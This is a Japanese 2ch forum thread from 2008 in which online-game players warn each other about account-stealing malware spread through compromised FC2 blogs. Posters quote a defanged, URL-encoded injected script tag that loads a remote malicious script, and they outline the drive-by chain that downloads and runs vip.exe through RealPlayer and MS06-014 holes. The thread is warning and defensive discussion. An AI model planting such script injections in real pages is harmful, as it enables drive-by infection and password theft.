Exploit.HTML.Bagle.Gen-4-eml
Exploit.IFrame.Gen
Worm.Bagle.H-zippwd-1
Exploit.HTML.Bagle.Gen-4-eml
Email.Phishing.DblDom-39
Trojan.VB-154
こいつらが合わせて19個みつかったｗ
最後の以外は全部メールの中。
最後のトロイの木馬はなぜか.exeファイルの中に。
M a cではやっぱウイルス対策ソフトは必要ないってことが
わかってよかったよｗ
いちいちWin専用ウイルスをスキャン～駆除する時間がもったいなさすぎる。
689 ：既にその名前は使われています：2008/03/21(金) 19:10:54.02 ID:JX2kFnn1: SPAMメールに仕組まれたExploit.Iframeって
固有IDを振ったURLを読み込ませてメアドの生存確認してるんじゃね
Win/Mac無関係のような希ガス
690 ：既にその名前は使われています：2008/03/21(金) 19:12:20.03 ID:cnnEuYmq: 226 名前：既にその名前は使われています[] 投稿日：2008/03/21(金) 18:53:18.36 ID:yR7Am9/m
>>225
あと、プライオンラインパスワードを保存しておいて
自動ログインするのではなく、
自動保存設定を解除した上でパスワードを変更し、
次回以降、毎回手入力でパスワード入力してログインすべき。
バーチャルキーボードなどのツールをつかって
マウスクリックでパスワードを入力すればさらに完璧。

なぜなら、現在多発している垢ハックの99%以上が
パソコン内のパスワード保存ファイルを盗んでいくタイプだから。

228 名前：既にその名前は使われています[] 投稿日：2008/03/21(金) 18:59:16.50 ID:yR7Am9/m
>>227
ちと待て。
今まで出てきた垢ハックツールというか垢ハック用マルウェアで
キーロガータイプがあったか？
あったら参考までに教えてくれ。対策撮りたいので。

初心者スレで不確定情報を広めるの止めてくださいMac君
691 ：既にその名前は使われています：2008/03/21(金) 19:14:45.34 ID:BlGE/mNF: マック君はハッキング知識が全く無く、「MACは安全＾＾」というCMのみを信じてすがるしかないヤツだからな・・・
ヌルーしてやれ。
692 ：既にその名前は使われています：2008/03/21(金) 19:19:54.03 ID:Q7NqsPR9: >>690
そのレスに限って言えば特に何か変な事を言ってるわけでは無いと思うのだが…
693 ：既にその名前は使われています：2008/03/21(金) 19:26:54.75 ID:AfMGNSpw: >>681,682,684
レストンクス！　カカッと7.0買ってきたは
あぐる！
694 ：既にその名前は使われています：2008/03/21(金) 19:29:45.16 ID:1/j9EAZq: >>692
垢ハックの99％以上がパスワード設定ファイルを盗まれての被害だってのは
業者以外に分かるもんなのか？
695 ：既にその名前は使われています：2008/03/21(金) 19:32:44.91 ID:7lxfS9dH: >>693
カスペルおめ。

このアプリの接続をヌルーすると言う設定に気付かず、
ウィンドゥモードにしてエリアチェンジするたびに
「POLが不明な接続先に接続しようとしています。接続しますか？」
というダイアログをいちいちクリックしていた・・・・・orz
696 ：既にその名前は使われています：2008/03/21(金) 19:54:48.25 ID:OZ8DztAT: >>689
なるほど勉強になりますスレですね。ここは＾＾
>>694
そらわからんけど99%っていう数字は当たらずとも遠からず
だと思うけどね。
前の方で書き込みあってたけど
キーロガーで不特定多数からパスワードを盗むってのは
至難の業だし、
パスワード設定ファイルをそのまま盗んでいった方が
100倍以上効率がいいはず。
業者がMacを狙わず、Winを狙うのは効率を考えているからで、
その線から考えても妥当な考えかと。
697 ：既にその名前は使われています：2008/03/21(金) 20:05:29.64 ID:cmlEh2ds: >>696
>業者がMacを狙わず、Winを狙うのは効率を考えているからで、
>その線から考えても妥当な考えかと。

MacにFFのパスワード設定ファイル保存してる奴が世界に何人いるんだ？
MacからFFのパスワード設定ファイル抜くトロイ作ることがほぼ無駄ってことは
業者じゃなくてもわかるよな？
698 ：既にその名前は使われています：2008/03/21(金) 20:17:52.03 ID:IEw5PmDY: GMサポート中断に関するお知らせ(3/21)

下記日時におきまして、ゲームマスター(GM)チーム全体会議を行うため、GMサポートを中断いたします。
この時間中は、GMコールをお送りいただきましても、GMがお話を伺うことができません。GMによるサポートが必要な場合には、会議が終了します22:00以降に改めてGMコールをお送りください。

お客様にはご迷惑をおかけいたしますが、ご了承いただけますようお願いいたします。

　　　　　　　　　　　　　記

日　時：2008年3月21日(金) 20:00より22:00まで

対　象：日本国内版で以下のGMサポートをご利用のお客様
　　　　・プレイオンラインGMコール
　　　　・プレイオンライン各コンテンツ内でのGMコール

いい加減にしろよ■e＾＾； age
699 ：既にその名前は使われています：2008/03/21(金) 20:22:28.60 ID:ltuJAup0: 日本国内版GMサポート永久中断に関するお知らせ(3/21)

下記日時におきまして、ゲームマスター(GM)チーム全体会議を行うため、GMサポートを中断いたします。
この時間中は、GMコールをお送りいただきましても、GMがお話を伺うことができませんし、伺いたくもありません。GMによるサポートが必要な場合には、直接スクウェア・エニックスサポートまでお電話下さい。

かたじけのうござる。

　　　　　　　　　　　　　記

日　時：2008年3月21日(金) よりサービス終了まで

対　象：日本国内版で以下のGMサポートをご利用のお客様
　　　　・プレイオンラインGMコール
　　　　・プレイオンライン各コンテンツ内でのGMコール
700 ：前スレ582：2008/03/21(金) 20:47:28.70 ID:IvuYzG7Q: 10日くらいに届くといわれた請求書が来ないので再度サポセンに電話してみた。
すぐに送るはずが、なぜか4月に請求するものたちに誤って入っていたとのこと…
もっと早く催促すればよかった。すぐに月曜に発送しますと言われたけど。
で、1月以降の分もおそらくまた請求かけてくるはずで
じゃあ支払ってインできてもまた同じようにとめられるんだよね？
それって無駄では？こちらがもう支払わないって言ったらどうするの？
という問いに「リスクを負ってインするかどうかはお客様の自由です」だって。
そうだよね。自由だよね。

懲りずに余分にあった別垢で暇つぶししてるけど
被害にあった金曜の夜は、いつもインできるかどうかドキドキしてるわ。
土日サポセン休日で月曜も11時からだから平日仕事の社会人はやきもきするよね。
それを狙ってんのかな。
701 ：既にその名前は使われています：2008/03/21(金) 22:10:51.38 ID:pYrp5DdK: 保守
702 ：既にその名前は使われています：2008/03/21(金) 23:51:13.45 ID:ci/XUxd4: 週刊オンラインゲームアップデートレポート
http://ime.nu/www.watch.impress.co.jp/game/docs/20080321/on0321.htm
アカウント盗用を目的とした大規模なニュースが報じられる
被害に遭う前に、セキュリティの見直しを
703 ：既にその名前は使われています：2008/03/22(土) 00:14:58.86 ID:RUXIxuA/: age
704 ：既にその名前は使われています：2008/03/22(土) 01:27:56.83 ID:8t/nHuh6: 注意喚起注意喚起
705 ：既にその名前は使われています：2008/03/22(土) 02:20:55.58 ID:MmHd1tKd: ほ
706 ：既にその名前は使われています：2008/03/22(土) 04:19:24.27 ID:uo3kZ88u: パス抜きのウィルスってルータ経由で感染するのか…。
PC知識限りなく0でエロサイト巡回が趣味で自分のPCを誰にも触らせない弟がいる俺ｵﾜﾀ。
707 ：既にその名前は使われています：2008/03/22(土) 06:03:41.92 ID:D48bOfj+: >>706
ルーターがあるなら弟のPCと自分のPCを別セグメントにしてPC間で通信できないよ
うにすればいいんじゃねーの？
708 ：既にその名前は使われています：2008/03/22(土) 07:54:23.50 ID:pcABNhlC: また購入者～スレ落ちたにゃ、もう慣れっこにゃ
春休みパワー凄いなw
709 ：既にその名前は使われています：2008/03/22(土) 08:17:31.87 ID:RvtYUyWm: >>707

>>706はセグメント超えとブロードバンドルータ配下にぶら下がる同一セグメント内のHUB経由接続の
区別が分かってないと思うけど。
710 ：既にその名前は使われています：2008/03/22(土) 09:21:30.87 ID:s/p1nPgY: ペコろぐに罠が仕込まれていたかも・・・気をつけて！
JSに書かれたURLエンコードされてるアドレスを辿っていくと、
下のアドレスのページを読み込んでいたみたい。
http://ime.nu/www■hellh■net/vip.htm
http://ime.nu/www■hellh■net/dv.htm

今は消されているのかな？
ソースチェッカーオンラインで調べたら、キャッシュを見ているせいか罠っぽいJSも残ってた。
今週末もやばそうだ・・・
711 ：既にその名前は使われています：2008/03/22(土) 09:51:03.42 ID:QQIop/6A: >>710
hellhは罠アド。
気をつけて！
712 ：既にその名前は使われています：2008/03/22(土) 09:53:41.65 ID:mnXb1A/y: 上にもあったけど公式のLSコミュニティが乗っとられたら被害すごそうだね
パス入力したら業者に筒抜けとかなったら頭がおかしくなって死ぬ
あぐる
713 ：既にその名前は使われています：2008/03/22(土) 10:34:32.75 ID:5TeUNyVm: >>710
消されていない。
今のhellhはASPで制御を行っている(HTTPヘッダのContentで飛ばす)。
ページ構造は
Default.htm
→head.asp
　→(初回) error.htm
　　→dv.htm (スクリプトその1)
　　→vip.htm (スクリプトその2)
　→(次回) http://ime.nu/search.fc2.com
スクリプトはvip.exeをダウンロードし実行。
使う脆弱性は以前と変わってなければRealPlayerとMS06-014。
714 ：既にその名前は使われています：2008/03/22(土) 10:57:04.98 ID:GEHSzlCf: ぺこログをソースチェッカーオンラインにかけてソース参照して見てるんだが
罠が仕込まれてる箇所が見当たらない。
すまないが自分のところチェックしたいから
もう少し噛み砕いて詳しい場所を教えてもらえないだろうか？
715 ：既にその名前は使われています：2008/03/22(土) 11:04:34.06 ID:5TeUNyVm: iframeじゃなくてscript。
URIはエンコしてある。
716 ：既にその名前は使われています：2008/03/22(土) 11:05:06.00 ID:s/p1nPgY: >>713
詳しい説明ありがとう

>>714
二つ目の　▲▲ プラグインカテゴリー１ ▲▲　の下にあったよ
717 ：既にその名前は使われています：2008/03/22(土) 11:09:05.70 ID:HbzOlOUL: FC2マジでやばいな
今日はFC2ブログを見に行かないほうがいい

現時点でぺころぐが黒なのは確定？
718 ：既にその名前は使われています：2008/03/22(土) 11:11:46.14 ID:GEHSzlCf: >>716
トンクス！
今見てるソースだと以下のようになってるから消えてってことなのかな。
とりあえず自分のトコもみてくるは。
719 ：既にその名前は使われています：2008/03/22(土) 11:21:31.11 ID:s/p1nPgY: >>718
自分でペコログを直に見に行った時もそう表示されてた。
だから既に消されてるのかと思ったんだよね
713が見つけた罠は別の部分なのかもしれない。
720 ：既にその名前は使われています：2008/03/22(土) 11:22:05.54 ID:u73ogFcu: ウィルス対策ソフトMcAfeeなんだけどPC起動時に自動起動のはずが
エラーで落ちちゃうんだよね。
再起動してもだめだったからもしやとおもいカスペでオンラインスキャン中

残り３０％で
見つかったウィルス１、感染したオブジェクト１

ウィルス悪さしてMcAfee起動とめてたのかな・・
とりあえずトライアル版落として駆除してみます
721 ：既にその名前は使われています：2008/03/22(土) 11:35:37.70 ID:5TeUNyVm: >>718-719
普通にトップページのソース見てみ。頭のほうに
<script src="hxxp://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
があるでしょ(踏まないようhttpはhxxpにしてある)。
722 ：既にその名前は使われています：2008/03/22(土) 11:51:51.97 ID:HbzOlOUL: >721
気になったのでダウンロードツールでindexをファイルとして落としてみた
ＦＣ２のアクセス解析のアドレスがwww■hellh■net/w.js　になってるんですが・・・

おいおい、やばくね？
723 ：既にその名前は使われています：2008/03/22(土) 11:55:22.72 ID:s/p1nPgY: >>721
ありがとーばっちりあったｗ
724 ：既にその名前は使われています：2008/03/22(土) 11:57:08.47 ID:RUXIxuA/: これはネ実全体に注意を促したほうがいいような
725 ：既にその名前は使われています：2008/03/22(土) 12:01:20.68 ID:GEHSzlCf: >>721
見落としたのかわからんけど、今みたらしっかりとあった。トンクス。
アクセス解析の直下か・・・
726 ：既にその名前は使われています：2008/03/22(土) 12:04:28.37 ID:5TeUNyVm: scriptも使えるってのは >>276 で、
hellhが更新されてるってのは >>626 で書いた(´・ω・｀)
727 ：既にその名前は使われています：2008/03/22(土) 12:05:14.07 ID:s/p1nPgY: 一番読者が多そうなサルスレでは既に話題になってるよ
728 ：既にその名前は使われています：2008/03/22(土) 12:08:06.14 ID:RUXIxuA/: 立ててみた

FC2ブログを見に行くと垢ハックされるぞ
http://live27.2ch.net/test/read.cgi/ogame/1206155257/
729 ：既にその名前は使われています：2008/03/22(土) 12:12:56.10 ID:5TeUNyVm: FC2全体がやられているわけじゃないのに…。
私のブログもFC2。誰も来ないけどね!
730 ：既にその名前は使われています：2008/03/22(土) 12:17:43.23 ID:RUXIxuA/: 浮上
731 ：既にその名前は使われています：2008/03/22(土) 13:06:28.35 ID:1nSfINA3: ペコろぐ見ただけで感染するの？
数時間前に見てもうヴァナにもインしちゃったんだけど・・・
732 ：既にその名前は使われています：2008/03/22(土) 13:10:50.27 ID:ePhB4KTm: >>731
windows updateやブラウザなどにもよるが、
その可能性が高いってことだな。
今すぐカスペルスキーオンラインスキャンとか複数の
スキャンサービスでチェックしておけ。
733 ：既にその名前は使われています：2008/03/22(土) 13:11:20.75 ID:2EgMgjZt: ネット見ないPCかPS2は持ってないの？
734 ：既にその名前は使われています：2008/03/22(土) 13:11:54.42 ID:5TeUNyVm: IE(およびIEコンポーネントブラウザ)で、
以下のいずれかを満たせば感染する可能性がある。
・WindowsUpdateをしていない。
・RealPlayerが入っている。
735 ：既にその名前は使われています：2008/03/22(土) 13:14:40.55 ID:vocyVObw: つまりFirefoxかOpera最強って事か
736 ：既にその名前は使われています：2008/03/22(土) 13:14:55.35 ID:YN+ttw1L: 注意喚起あげ
737 ：既にその名前は使われています：2008/03/22(土) 13:18:21.98 ID:wCa2Bfwz: >>731
さようならｗ
738 ：既にその名前は使われています：2008/03/22(土) 13:19:55.51 ID:ndD5A19m: >>731
無茶しやがって・・・
739 ：既にその名前は使われています：2008/03/22(土) 13:27:02.59 ID:5TeUNyVm: >>735
今はSafariもあるぜ。
現時点でWindowsでは最も狙われていないブラウザだ(元はMac用だが)。
740 ：既にその名前は使われています：2008/03/22(土) 13:35:56.23 ID:vocyVObw: Safariもいいんだけど、重い＆仕様の問題で
よく見るサイトでレイアウト崩れるところがあってさｗ
Firefoxでも同じだけどね。うーむ
741 ：既にその名前は使われています：2008/03/22(土) 13:41:08.83 ID:hVrvaUvQ: マイナーで狙われないって条件ならAmaya10.0ってのも
742 ：720：2008/03/22(土) 13:41:32.21 ID:u73ogFcu: 汗って書き込んでしまったがWinny.exeをマルチウェアとして検知してただけだったｗ
もうつかってもないし削除しといたわ

マカフィー起動できないのはただの不具合っぽい
問い合わせたら再インストールよろｗだった。

このハックまっさかりな時期だからはやとちりしてしまった。
743 ：既にその名前は使われています：2008/03/22(土) 13:47:06.09 ID:Sk+5Gwm0: >>742
何事もなかったのは何よりだが、あまりよろしくない原因だな
744 ：既にその名前は使われています：2008/03/22(土) 13:49:51.04 ID:5TeUNyVm: >>741
それはマイナー過ぎるｗ
745 ：既にその名前は使われています：2008/03/22(土) 14:04:32.06 ID:ZC/O1gOR: いくらIEでもセキュリティー設定を「高」にしてれば感染しようがないよね？
746 ：既にその名前は使われています：2008/03/22(土) 14:04:37.31 ID:hVrvaUvQ: 日本語表示が困難つーか無謀なんだけどねAmaya
747 ：既にその名前は使われています：2008/03/22(土) 14:31:19.75 ID:Jiv6k8QH: >>745
それですむなら苦労しない
748 ：既にその名前は使われています：2008/03/22(土) 14:39:20.62 ID:ZC/O1gOR: >>747
真面目な話、どうやって感染させるの？
JavaもJavascriptもActiveXも無効な状態でどうやってトロイをダウソさせるの？
749 ：既にその名前は使われています：2008/03/22(土) 14:41:28.59 ID:Qnt4FZ/o: >>748
そう思うなら、その設定で満足すればいいじゃない。
750 ：既にその名前は使われています：2008/03/22(土) 14:42:47.34 ID:ZC/O1gOR: >>749
煽るだけなら無駄なレスをしないでくれ
751 ：既にその名前は使われています：2008/03/22(土) 14:49:43.40 ID:D9wiaINR: >>750
知識ないから煽ることしかできないんだろうなｗ

IEの仕組み的にそれだけしてたら問題ないと思われ。
752 ：既にその名前は使われています：2008/03/22(土) 14:51:59.86 ID:Qnt4FZ/o: こんなの煽りでも何でもないだろ・・・・。
753 ：既にその名前は使われています：2008/03/22(土) 14:52:40.53 ID:hVrvaUvQ: GDIの脆弱性とかアニメーションカーソルの脆弱性とかもあったから
画像とカーソルもOffに
Ftpとかhttp外のプロトコルを指定してブラウザ以外を起動させたりもあるから
MIME関連の設定も解除

具体的な方法は知らんのぜ
754 ：既にその名前は使われています：2008/03/22(土) 14:54:05.39 ID:hVrvaUvQ: あ、FtpはねーなTelnetとか
755 ：既にその名前は使われています：2008/03/22(土) 14:55:41.03 ID:Uv6AgB6p: IE高設定したら問題ないとか無いわ
756 ：既にその名前は使われています：2008/03/22(土) 15:00:07.08 ID:ZC/O1gOR: >>753-754
なるほどありがとう。
なんか昔生IP抜きとかではやったやり方に似てるね＞telnet
757 ：既にその名前は使われています：2008/03/22(土) 15:03:47.14 ID:5TeUNyVm: IE7ではgopherもtelnetも廃止された。
758 ：既にその名前は使われています：2008/03/22(土) 15:23:12.35 ID:D48bOfj+: IEのセキュリティレベル高にしたらIFRAME無効にしたっけ？
無効にしてないと最近流行りのfc2ブログ関連のは防げないんじゃなかったっけ？
759 ：既にその名前は使われています：2008/03/22(土) 15:28:46.97 ID:WkwPB8Le: IFRAME無効にしてても、WindowsUpdateしてなかったらアウトだよ。
760 ：既にその名前は使われています：2008/03/22(土) 15:45:50.01 ID:5MOOpotD: http://ime.nu/dl.square-enix.co.jp/fmo/FMONVT.zip
761 ：既にその名前は使われています：2008/03/22(土) 15:53:29.89 ID:hVrvaUvQ: >>760これがどうかしたのか？
http://ime.nu/www.playonline.com/fmo/download/tool.html
762 ：既にその名前は使われています：2008/03/22(土) 15:55:30.85 ID:s90NMzSV: というかもうPC版はサービス終了するしかないんじゃないのか？
763 ：既にその名前は使われています：2008/03/22(土) 16:00:04.14 ID:Jiv6k8QH: セキュリティー設定を高にすれば、危険性は減るが万全じゃない
だからこそセキュリティーソフトなりを使ってより安全性を高めようとしている

この辺がわからずに

「いくらIEでもセキュリティー設定を「高」にしてれば感染しようがないよね？」

と言う問いがされたとすれば、こちらとしては「それですむなら苦労はしない」
としかいいようがない訳で
理解してたらこんな問いもでないと思うが

それでも煽りというのであれば、設定高だけにしておけばよろしいかと
764 ：既にその名前は使われています：2008/03/22(土) 16:01:11.16 ID:5MOOpotD: >>761
誤爆ｗすまそ
765 ：既にその名前は使われています：2008/03/22(土) 16:16:29.42 ID:vy+n90eR: >>762
ルータで繋がってたらPS2・箱でもパス抜かれる危険があるんだぞ
766 ：既にその名前は使われています：2008/03/22(土) 16:27:55.87 ID:hVrvaUvQ: うちのPCはミラーポートにもつないでるからマジでやばいぜ
767 ：既にその名前は使われています：2008/03/22(土) 16:32:06.50 ID:lTsjxnPV: ミラーボールにもつないでいると読んで、うらやましかった
768 ：既にその名前は使われています：2008/03/22(土) 16:37:55.57 ID:hVrvaUvQ: PC制御のミラーボールとかどんなんだよｗｗｗ
つーか自宅にミラーボールとかねーよｗｗｗｗ
769 ：既にその名前は使われています：2008/03/22(土) 16:43:25.35 ID:5MOOpotD: USB接続
回転数制御可能
￥３６００-
770 ：既にその名前は使われています：2008/03/22(土) 16:46:25.89 ID:HfzUpChN: 脆弱性ってのは、本来ありえない状況の中に穴が開いてるから脆弱性なわけで・・・
「本来は」Javascript動かしてようが、実行ファイルを勝手に実行されたりせんよ
同じように、セキュリティ設定を最高にしようが、穴が開いてたら勝手に実行される
その穴がどこに開いてるか、というだけの話
771 ：既にその名前は使われています：2008/03/22(土) 17:14:17.57 ID:pcABNhlC: うぼぁ、通報しまくれスレまで落ちた。何が起きてるんだ？w
772 ：既にその名前は使われています：2008/03/22(土) 17:14:37.16 ID:8t/nHuh6: IEの「インターネットオプション」にある「プライバシー」のつまみはウイルス防御の
安全性ではなくてプライバシーの保護のためのクッキーのブロック設定だと思うよ。
それとはまた別に「セキュリティ」のレベルを設定できる項目があるのかな？
773 ：既にその名前は使われています：2008/03/22(土) 17:23:24.13 ID:5MOOpotD: >>771
ハック関連建ちすぎｗ
774 ：既にその名前は使われています：2008/03/22(土) 17:48:53.45 ID:7y+E8mXd: 立ちすぎてもいいくらいだろ
775 ：既にその名前は使われています：2008/03/22(土) 17:54:41.55 ID:7p3UflXp: 業者がfc2ハックに気づく人が少なくなるように、糞スレ乱立させてるんだろう。
776 ：既にその名前は使われています：2008/03/22(土) 18:07:57.99 ID:Jiv6k8QH: なんかえらいことになっとるな
777 ：既にその名前は使われています：2008/03/22(土) 18:12:08.27 ID:q0RhafP0: ミラーマンがどうした？
778 ：既にその名前は使われています：2008/03/22(土) 18:12:34.45 ID:1oBpFBmE: 今できるのはセキュリティ導入、アップデータ常に更新、怪しいURLは踏まないくらいかね。あと、ゲーム内業者も通報するといいな。一人一業者通報するだけでちがうぞ
779 ：既にその名前は使われています：2008/03/22(土) 18:15:06.17 ID:WppxuQg5: オカ板のスレだけど、１～１１までのテンプレはウィルス対策の参考になるよ

勇気がなくて見れない画像解説スレinオカ板Part115
http://hobby10.2ch.net/test/read.cgi/occult/1204378619/1-11

個人的にはマルウェア駆除の仕方が詳しく載ってる下記のサイトお勧め
■アダルトサイト被害対策の部屋
　http://ime.nu/www.higaitaisaku.com/
780 ：７３１：2008/03/22(土) 18:45:09.71 ID:1nSfINA3: カスペルダウンロードしてスキャンしてみたよ
他のプログラムで使用中のためスキャンできません。というのがいくつか出たけどそれ以外は問題ないみたいだった
FFをログアウトして再チェックした方がいいんだろうか
781 ：既にその名前は使われています：2008/03/22(土) 18:47:22.11 ID:8t/nHuh6: >>780
新種の可能性も含めると、どれだけ調べても感染していないって断言するのは難しくなるけど
カスペで平気なら多分大丈夫じゃないかな。
一応PG2入れてみたらどうだろう
782 ：既にその名前は使われています：2008/03/22(土) 18:54:36.16 ID:1nSfINA3: ペコログ見てるときもウィルスバスターでチェックしながら見てたんだけど何も検出されなかったんだ
リンク先に飛ばなきゃいいんだろうくらいに考えてたからインしちゃったよorz
PG2とやらも調べてみます。アドバイスありがとう
783 ：既にその名前は使われています：2008/03/22(土) 19:06:53.40 ID:5TeUNyVm: バスターｗ
784 ：既にその名前は使われています：2008/03/22(土) 19:08:58.27 ID:3QmEvd6Q: このやばいブログって
そのブログ書いてる人が仕込んでるの？
785 ：既にその名前は使われています：2008/03/22(土) 19:14:09.83 ID:Yp9qNcd0: >>784
んなわけないが
どういう経路で改竄されたのかは不明だな。

ペコろぐのIDとパスを業者が入手して、ログイン→テンプレ改竄したのか
FC2自体に問題があって、どのブログでも改竄できる可能性があるのか。
786 ：既にその名前は使われています：2008/03/22(土) 19:24:26.75 ID:ku5aN7/A: FC2のIDpass抜かれたにしても、
FC2の脆弱さをついたにしても、
どちらにせよどのブログでも改竄される可能性は有るとみるべきだろうね

IDpass抜かれての→改竄じゃ、FC2だけでなくそれこそどのブログも危ない。
この場合はテンプレに仕組めなくとも記事にリンク貼り付ける事だって出来るのだから
JVスクリプトやインラインフレームが使えないブログだろうが危険って事になる。
787 ：既にその名前は使われています：2008/03/22(土) 19:47:25.31 ID:PyYqXxGd: 糞業者死ねage
788 ：既にその名前は使われています：2008/03/22(土) 19:51:59.32 ID:MmHd1tKd: >>782
蛇足だけどPG2の正式名称はPeerGuardian 2 な
検索でもでてくるけど
789 ：既にその名前は使われています：2008/03/22(土) 21:44:40.55 ID:uQjThc3f: 注意喚起age
790 ：既にその名前は使われています：2008/03/22(土) 22:41:17.81 ID:c1EjNdx9: fc2は昔からこの手の対策がヌルい印象がある。
Googleブログ検索の最新検索結果にしつこく残るのがfc2のスパムブログだった。
791 ：既にその名前は使われています：2008/03/22(土) 23:24:08.56 ID:8Qq7p8wI: PG2の設定でリネ資料室を参考にする場合は、PG2のリスト管理の画面で表示されるファイルは
「中国・韓国・台湾」と「Lineageトロイ」の2つであってますか？
792 ：既にその名前は使われています：2008/03/22(土) 23:44:31.66 ID:ePhB4KTm: ヴァナモンblogハクられてるしｗｗｗｗｗ
テラヤバスｗｗｗｗｗｗｗｗｗ
793 ：既にその名前は使われています：2008/03/22(土) 23:56:00.48 ID:IXSPhTOx: 何か悲しいよなぁ、ヴァナの中にはここ見てないやつで
ブログ巡回してる人なんて多数いるだろうに・・・
自己責任とはいえ、ここに張られてるURLに飛ぶのとは訳が違うからなぁ
次の■e発売のネットゲーのためにもとっとと対応してもらいたいもんだ
794 ：既にその名前は使われています：2008/03/22(土) 23:59:39.73 ID:UQcw9Ojd: ヴァナモンの詳細ｋｗｓｋ
795 ：既にその名前は使われています：2008/03/23(日) 00:01:34.90 ID:jZEtFSnG: >>791
登録の仕方があってるならあってる
796 ：既にその名前は使われています：2008/03/23(日) 00:01:43.36 ID:ufQYSroS: >>791
あってるよ
797 ：既にその名前は使われています：2008/03/23(日) 00:16:01.99 ID:5xv78arS: >>794
ヴァナモンブログのURLをgoogle検索すると
「有害なスクリプトが含まれています。」
ページのソースみると
<script src="hxxp//%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%77%2E%6A%73"></script>
ってのがある。（実際にはhttpだが改変。）
798 ：791：2008/03/23(日) 00:16:07.31 ID:ZKgLDHHD: ありがとうございます。
PG2をインストールした時はリネ資料室の設定手順を見てなかったので、
PG2側で用意してくれてたリストも出してたのですが、リネ資料室の手順では
PG2側で用意してくれてるリストは全てチェック入れなくていいと書いてあったので
後から消したのですけど本当に消してよかったのか気になってました。
799 ：既にその名前は使われています：2008/03/23(日) 01:14:08.93 ID:C025yDr/: ほしゅる
800 ：既にその名前は使われています：2008/03/23(日) 01:39:30.88 ID:m4+CSXBl: 垢ハック業者がＯＤＮ使ってたらしくＯＤＮ全ユーザーが今まで規制されてたよ
今は一部ホスト規制になったけどまたいつ規制されるかわからなくて俺涙目
801 ：既にその名前は使われています：2008/03/23(日) 01:43:53.45 ID:BF1y+lk+: OFSfb-（ODNドメインの一部）は罠サイト貼りまくりで2ch以外のFF関連サイト
では軒並み規制されてる。いろいろ面倒だけど、業者を撃退するにはやむを得ないと
あきらめてる。
802 ：既にその名前は使われています：2008/03/23(日) 01:56:52.64 ID:oaVT+1dp: >>800
最近業者の宣伝に使われる事多いよな…
俺は別プロバイダ(eoだよこんちくしょー)だが、気持ち解るぜ…
今夜は飲み明かそうぜ…
803 ：既にその名前は使われています：2008/03/23(日) 01:59:11.23 ID:m0/ANJjp: >>797
ヴァナモンの方は大丈夫？
ブログのみ？
804 ：既にその名前は使われています：2008/03/23(日) 02:00:58.11 ID:7Pxz+tiR: スクエニは認証方法を変える対策しないと駄目だろ
FF11でグダグダだったら以降のネトゲも評価するきにならん
805 ：既にその名前は使われています：2008/03/23(日) 02:10:04.85 ID:jGdH/gj4: さっきまで規制されてたODNだけど
速攻カウンターで削除依頼だしまくって締め出すしかいい対策が思いうかばねぇ
まだ規制されてる人も居るんですなおに喜べない。

協力してくれる人が居れば嬉しい。
削除依頼のしかたは知らない。
806 ：既にその名前は使われています：2008/03/23(日) 02:12:33.60 ID:alV122Bi: 速攻で削除依頼しまくるしかない！
お前ら協力してくれ！
でも俺は依頼の仕方知らない。

どんだけーｗｗｗｗｗｗｗｗｗｗｗｗ
807 ：既にその名前は使われています：2008/03/23(日) 02:17:58.56 ID:jGdH/gj4: サーセンｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

こんなことくだらないことが書き込めるなんてうれしいっビクビクッ
808 ：既にその名前は使われています：2008/03/23(日) 02:45:06.39 ID:BF1y+lk+: 罠サイトコピペを見つけたらBoo2008で撃退できないか試してください。
Boo2008というのは公開プロクシを焼く（規制する）2chの仕組みで、誰でも利用できます。
↓ここにある「Boo2008 RED」に罠カキコのURLなどを指定して実行すると、書き込んだホストを
調査してそれが公開プロクシあるいは逆引き名前解決ができないホストであれば、書き込みを
規制できます。
http://boo.2ch.net/
ODNのOFSfb-、TEPte-が規制されている今、罠カキコの多くがBoo2008で焼けるホストから
ポストされています。実行結果に「Wow! tasty good!」と表示されれば「焼けた」しるしです。

Jane Style/Nida/Viewを使っているなら、こちらにある「Boo2008 REDスクリプト」を使うと
簡単にBooできます。
ttp://www.geocities.jp/nanasi_san_exe/
ちなみに、このサイトはJane Viewのヘルプを作っているかたのサイトです。
809 ：既にその名前は使われています：2008/03/23(日) 02:50:16.29 ID:Y0PuukFM: 公式もついに来たね
810 ：既にその名前は使われています：2008/03/23(日) 02:52:47.87 ID:7Pxz+tiR: >>809
？
811 ：既にその名前は使われています：2008/03/23(日) 03:00:09.44 ID:SdrCzK3B: ネカフェとかでやってるやつもそんなにいないと思うし、
家のIPからだけしか繋げられないとかできないもんなの？■e
812 ：既にその名前は使われています：2008/03/23(日) 03:21:20.56 ID:1NIP/0wq: 垢ハックのせいで以前のようにweb巡りしながら気楽に遊べなくなっちまったな
立派な営業妨害だと思うが大元がｼﾅである限りどうしようもないという

いまや気楽に遊べるのは、何も知らないだけの奴か
FFを遊んでいるハードとweb端末を完全に隔離している奴だけという
813 ：既にその名前は使われています：2008/03/23(日) 03:25:44.91 ID:dp5+7hHR: カスペルスキーでしか検出できない？
814 ：既にその名前は使われています：2008/03/23(日) 03:27:18.41 ID:YRC99ICz: >>809
公式になにもきてないわけだが？
815 ：既にその名前は使われています：2008/03/23(日) 04:05:18.72 ID:1XW8eX52: LSメンが2週連続でハックされた
今度は鯖移動のおまけつきで
ウイルスが消えてない状態でパスをかえてまたインしてしまったのか連絡がつかないので
詳細はわからない
かなり異例だと思うし、されるほうにも問題があると思うが一度ハックされても事後処理は隅まで行おう
816 ：既にその名前は使われています：2008/03/23(日) 04:05:40.62 ID:fIC9E8u/: このスレは常時ageでお願いします
817 ：既にその名前は使われています：2008/03/23(日) 04:12:08.56 ID:EoJTviQ/: >>811
地方に出張したリーマンプレイヤーとかよくネカフェとかでやってるぞ、まぁ大抵そこでパスぬかれるぽいけど…
818 ：既にその名前は使われています：2008/03/23(日) 04:12:08.22 ID:+ili/ZnK: リンクシェルコミュニティに障害のこと？まさかこれ業者なのか？
819 ：既にその名前は使われています：2008/03/23(日) 04:35:21.82 ID:1ZZqShk7: バスターってダメなのか？ｗ
820 ：既にその名前は使われています：2008/03/23(日) 04:40:02.00 ID:xXOcBYrs: 俺バスター使ってるけど駄目って程でもないよ
もちろんバスターだけにセキュリティを任せるわけじゃなく
ここでも紹介されてるソフトいれたりIEの設定を変えたり
怖いからPCではインターネットするのを止めた
